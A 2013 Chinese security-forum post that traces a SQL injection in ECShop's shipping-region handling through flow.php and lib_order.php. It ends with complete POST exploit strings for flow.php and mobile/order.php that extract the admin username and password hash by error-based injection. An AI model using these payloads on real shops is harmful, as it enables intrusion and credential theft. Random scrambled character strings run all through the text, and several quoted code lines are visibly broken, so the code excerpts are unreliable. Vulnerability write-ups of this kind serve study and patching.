中国网络渗透测试联盟

标题: ecshop全版本注入分析 [打印本页]

---

作者: admin    时间: 2013-1-13 09:48
标题: ecshop全版本注入分析
前段时间大概2012年圣诞节左右，在t00ls上看见ecshop全版本注入，当时也下载了最新的程序分析了下,最近考试比较忙，今天刚考完，把我分析的记录下来。

! [* B5 w1 C. ~( X+ L    漏洞关键文件：

    /includes/lib_order.php

    关键函数：


7 \- ?7 _& e! f. |/ Q4 B. l
8 z# N+ y  Q. B7 {) n+ a3 v01     function available_shipping_list($region_id_list)

02 {

( ^5 d: h; Z8 P0 O! l, U03     $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .
0 V# g$ f- O( h. J4 {  C& C
! g! q6 `2 v* g* u1 o04                 's.shipping_desc, s.insure, s.support_cod, a.configure ' .

& e3 y0 x4 P! ~05             'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .

06                 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .
* n3 R6 G  D9 J
% N5 B& a3 T2 Y. ?/ y6 n* U07                 $GLOBALS['ecs']->table('area_region') . ' AS r '.
$ `2 q# S! L& ]9 K
08             'WHERE r.region_id ' . db_create_in($region_id_list) .

  @$ }4 o6 B! Z  _1 k09             ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';

10   

9 |: Z2 P" d' V11     return $GLOBALS['db']->getAll($sql);
/ Q) h7 o4 e6 B, z( B- O
12 }

显然对传入的参数没有任何过滤就带入了查询语句。
; L) U) ?( u: i$ g, [
下面我们追踪这个函数在flow.php中：
第531行：   

1 $shipping_list     = available_shipping_list($region);
2 m5 h, H+ N: u4 I5 F+ j; Y
: K8 w1 a! B$ _# B, R

3 {2 l8 }# M$ q5 K

再对传入变量进行追踪：
: k" J1 B/ q! W
* b8 L9 Q5 j. k第530行：   

- }6 c, a, z0 G3 S; {- ?1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);


4 B# v0 L9 E& m+ G0 S( x
* F. v/ o% d; P. m2 R; {
4 H/ X" b- U+ ]7 K4 V
0 ~& r, l/ e% P. b6 X2 D! F第473行：        
0 L  n  v" ?& d
- k1 d1 |: ]: A1 o$ s) _, d! D1 $consignee = get_consignee($_SESSION['user_id']);

到了一个关键函数：

6 K  f' k3 y7 ^6 L+ f* J/includes/lib_order.php

8 c' U3 b; o; k1 f7 T
0 r- _5 w6 M& A( ]" G, m


1 u+ W; a( @" @5 D01 function get_consignee($user_id)
2 g2 U8 F% r  A' F2 v% H
02 {
" A8 q; Q& v1 L' D6 Q. n
: u( P1 C3 ]6 P) n03     if (isset($_SESSION['flow_consignee']))

4 [4 Z: r' {" S/ A04     {
1 X  D5 c7 M; B; l3 M
' l9 O* R# F6 w# V" g5 D05         /* 如果存在session，则直接返回session中的收货人信息 */

8 J% F6 {/ J5 w06   
$ K+ ?) e3 b$ v
* J, h% w9 i; K/ n. b07         return $_SESSION['flow_consignee'];

0 w: C: E& I8 y6 n' b08     }
+ s+ Y$ g1 i. t) c* g# V
09     else

1 O; m6 {7 b* l: A/ S10     {

9 N' [+ T0 b$ p3 N8 D6 E11         /* 如果不存在，则取得用户的默认收货人信息 */

2 v' W* O) }" w2 h9 g12         $arr = array();
6 `# F  a! G6 Q' f
# n, I* H3 _& g% Y  k13   

14         if ($user_id > 0)

8 {! \: G2 C5 S2 Z! `$ q15         {
& S) G/ d# p7 c3 x) Y6 I7 `
/ N) u! R) s8 V4 |& A. l% G- A16             /* 取默认地址 */
* X9 @+ u3 Z/ F5 E& N7 v! ^
17             $sql = "SELECT ua.*".
: P' W5 N$ E. ?. v3 Z1 `; y3 t
' \2 F  Z% i0 R! i18                     " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.

19                     " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";
, z5 ]# x1 d  t' u0 ?+ _
: h" W4 U! I1 l" N20   
" f5 M2 Q+ @! ^( i3 i
21             $arr = $GLOBALS['db']->getRow($sql);
: |5 D1 O) I% c8 T, w1 q5 M2 O
22         }

" F1 ]2 a! i& m) }. F+ e! W23   
' o" M$ C# Z. v$ `: m
+ V/ T$ |% ^: ~24         return $arr;
' s7 ^4 ?* B- ~0 H
25     }
* B2 d# @. \9 k1 U
5 j9 j( h) y0 x* U" W8 J3 i26 }
( _9 t& }) e. j* D- H# Z
显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢？

' v( i; D1 `: H- b
8 A# i0 J/ @7 ]  H% q+ i1 s& {; Y
: f+ x6 \* \9 m- C关键点:
" a$ m! T) ^$ @$ r& k
; Q' t, g% B% M3 z/ @8 X  A) J" U第400行：    $_SESSION['flow_consignee'] = stripslashes_deep($consignee);

这里对传入参数反转义存入$_SESSION中。

- g+ D$ k. P" k$ V; x- @

然后看下：
- \4 M1 _# E$ H2 T
; E8 \! C2 r& i; L3 Z

   

01 $consignee = array(
3 m0 b; Q  h3 s; A
02         'address_id'    => empty($_POST['address_id']) ? 0  :intval($_POST['address_id']),
/ s  C& Z% u9 G+ [
  g- \7 k3 i* F: B* O& x03         'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),

04         'country'       => empty($_POST['country'])    ? '' _POST['country'],

- n9 i) s0 ?5 c$ k05         'province'      => empty($_POST['province'])   ? '' _POST['province'],
; D8 G# u; z/ a8 l9 y# x4 h  _
( q, U. U  n/ x- M& H+ U; |& L06         'city'          => empty($_POST['city'])       ? '' _POST['city'],

' {3 I. t; k& V) Q$ k% W/ `) i" j07         'district'      => empty($_POST['district'])   ? '' _POST['district'],

08         'email'         => empty($_POST['email'])      ? '' _POST['email'],

09         'address'       => empty($_POST['address'])    ? '' _POST['address'],
% P/ W& H7 b# s4 g% B
10         'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),
: q7 t3 o$ Y5 y% s; w, g
# W3 R5 Y  C2 M- z# V" |4 M5 z) i& {11         'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),

! {0 }8 v$ d4 u$ N: J1 ]% H& R12         'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),

4 Y2 r! N+ f* ^& c) @' g0 f. F' n; d13         'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],

14         'best_time'     => empty($_POST['best_time'])  ? '' _POST['best_time'],
" h* Z3 [6 ?! R! i: r
15     );

. d, A4 W$ Z+ p3 Q: J! I" G" S% }好了注入就这样出现了。
; \3 N2 M% r9 a) j
: j( X2 L. |! q/ D7 F; U5 [==================

- L2 Z9 X) F7 Y, {' L# L% e注入测试：
3 c! ?& s0 c% N$ }, [
- t2 |# X+ d) r6 Q环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)

测试程序：ECShop_V2.7.3_UTF8_release1106



" d/ [! r- n  k; @1.首先需要点击一个商品加入购物车
% l9 k0 j: n" `7 ]7 O
9 L2 ?- t! [$ b# L" I, P2.注册一个会员帐号

$ Q" @$ S" g5 o' q) F3.post提交数据

- }7 Y+ ^% I3 ~# E0 e- ]
, ~+ s7 r& J, \
1 http://127.0.0.1/ecshop/flow.php

2   
4 o8 ]6 R; ~% f$ Q, J7 F( u
3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
举一反三，我们根据这个漏洞我们可以继续深入挖掘：

, h6 a# C0 l, D. E2 p$ G3 e  W6 v8 Y我们搜寻关键函数function available_shipping_list()

在文件/moblie/order.php中出现有，次文件为手机浏览文件功能基本和flow.php相同，代码流程基本相同

" N" y9 S/ D, Z! ~% m7 A' W利用exp:
/ k, C4 f) ^; Z3 `5 O
1.点击一个商品，点击购买商标

2.登录会员帐号

5 z0 I  @7 q* t/ F; }3.post提交：
% N1 K( v4 O8 t+ p' g4 ~0 T
  d% h5 d9 y. C' j& d: o% Lhttp://127.0.0.1/ecshop/mobile/order.php


& F$ u. V, G0 m; t4 \: R3 d
country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2